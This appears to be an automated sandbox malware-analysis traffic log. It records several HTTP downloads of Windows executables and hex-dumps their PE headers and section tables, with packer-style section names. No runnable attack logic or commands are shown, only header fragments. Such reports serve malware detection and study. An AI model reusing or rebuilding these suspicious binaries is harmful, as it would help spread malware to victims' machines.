e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Nov 2024 19:41:08 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Wed, 13 Nov 2024 19:06:18 GMTETag: "8e0a00-626d007592bf0"Accept-Ranges: bytesContent-Length: 9308672Content-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 ff f6 34 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 b4 44 00 00 52 49 00 00 00 00 00 d0 c1 44 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 05 00 02 00 05 00 02 00 00 00 00 00 00 20 8f 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 4c 00 9c 00 00 00 00 a0 4b 00 0e 49 00 00 00 90 53 00 00 8c 3b 00 00 90 4f 00 bc f7 03 00 00 00 00 00 00 00 00 00 00 30 4c 00 b0 59 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 4c 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 b2 4b 00 28 11 00 00 00 f0 4b 00 3c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 b2 44 00 00 10 00 00 00 b4 44 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f8 14 06 00 00 d0 44 00 00 16 06 00 00 b8 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 dc a7 00 00 00 f0 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 0e 49 00 00 00 a0 4b 00 00 4a 00 00 00 ce 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 3c 0e 00 00 00 f0 4b 00 00 10 00 00 00 18 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 9c 00 00 00 00 00 4c 00 00 02 00 00 00 28 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 70 03 00 00 00 10 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 6d 00 00 00 00 20 4c 00 00 02 00 00 00 2a 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b0 59 03 00 00 30 4c 00 00 5a 03 00 00 2c 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 70 64 61 74 61 00 00 bc f7 03 00 00 90 4f 00 00 f8 03 00 00 86 4e 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 13 Nov 2024 19:41:17 GMTContent-Type: application/octet-streamContent-Length: 3180032Last-Modified: Wed, 13 Nov 2024 19:21:24 GMTConnection: keep-aliveETag: "6734fc34-308600"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 ac 34 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ce 03 00 00 c0 00 00 00 00 00 00 00 90 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 30 00 00 04 00 00 04 60 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 40 05 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 05 00 00 10 00 00 00 20 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 30 05 00 00 00 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 05 00 00 02 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 76 64 6d 6d 6d 61 65 74 00 30 2b 00 00 50 05 00 00 2e 2b 00 00 32 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 78 71 6a 70 71 6e 6c 00 10 00 00 00 80 30 00 00 04 00 00 00 60 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 30 00 00 22 00 00 00 64 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 13 Nov 2024 19:41:23 GMTContent-Type: application/octet-streamContent-Length: 1799168Last-Modified: Wed, 13 Nov 2024 19:21:30 GMTConnection: keep-aliveETag: "6734fc3a-1b7400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 c0 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 68 00 00 04 00 00 e7 f6 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 68 65 77 72 6a 77 70 00 e0 19 00 00 d0 4e 00 00 d6 19 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 61 71 6a 6a 77 69 6f 00 10 00 00 00 b0 68 00 00 06 00 00 00 4c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 68 00 00 22 00 00 00 52 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 13 Nov 2024 19:41:32 GMTContent-Type: application/octet-streamContent-Length: 2811904Last-Modified: Wed, 13 Nov 2024 19:20:09 GMTConnection: keep-aliveETag: "6734fbe9-2ae800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 6a 77 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 6b 71 74 77 66 7a 6e 00 a0 2a 00 00 a0 00 00 00 88 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 6d 68 79 6a 71 75 62 00 20 00 00 00 40 2b 00 00 04 00 00 00 c2 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 c6 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 13 Nov 2024 19:41:43 GMTContent-Type: application/octet-streamContent-Length: 2811904Last-Modified: Wed, 13 Nov 2024 19:20:11 GMTConnection: keep-aliveETag: "6734fbeb-2ae800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 6a 77 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 6b 71 74 77 66 7a 6e 00 a0 2a 00 00 a0 00 00 00 88 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 6d 68 79 6a 71 75 62 00 20 00 00 00 40 2b 00 00 04 00 00 00 c2 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 c6 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 13 Nov 2024 19:41:51 GMTContent-Type: application/octet-streamContent-Length: 2811904Last-Modified: Wed, 13 Nov 2024 19:20:11 GMTConnection: keep-aliveETag: "6734fbeb-2ae800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 6a 77 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 6b 71 74 77 66 7a 6e 00 a0 2a 00 00 a0 00 00 00 88 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 6d 68 79 6a 71 75 62 00 20 00 00 00 40 2b 00 00 04 00 00 00 c2 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 c6 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 13 Nov 2024 19:42:11 GMTContent-Type: application/octet-streamContent-Length: 1799168Last-Modified: Wed, 13 Nov 2024 19:21:30 GMTConnection: keep-aliveETag: "6734fc3a-1b7400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 c0 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 68 00 00 04 00 00 e7 f6 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 68 65 77 72 6a 77 70 00 e0 19 00 00 d0 4e 00 00 d6 19 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 61 71 6a 6a 77 69 6f 00 10 00 00 00 b0 68 00 00 06 00 00 00 4c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 68 00 00 22 00 00 00 52 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

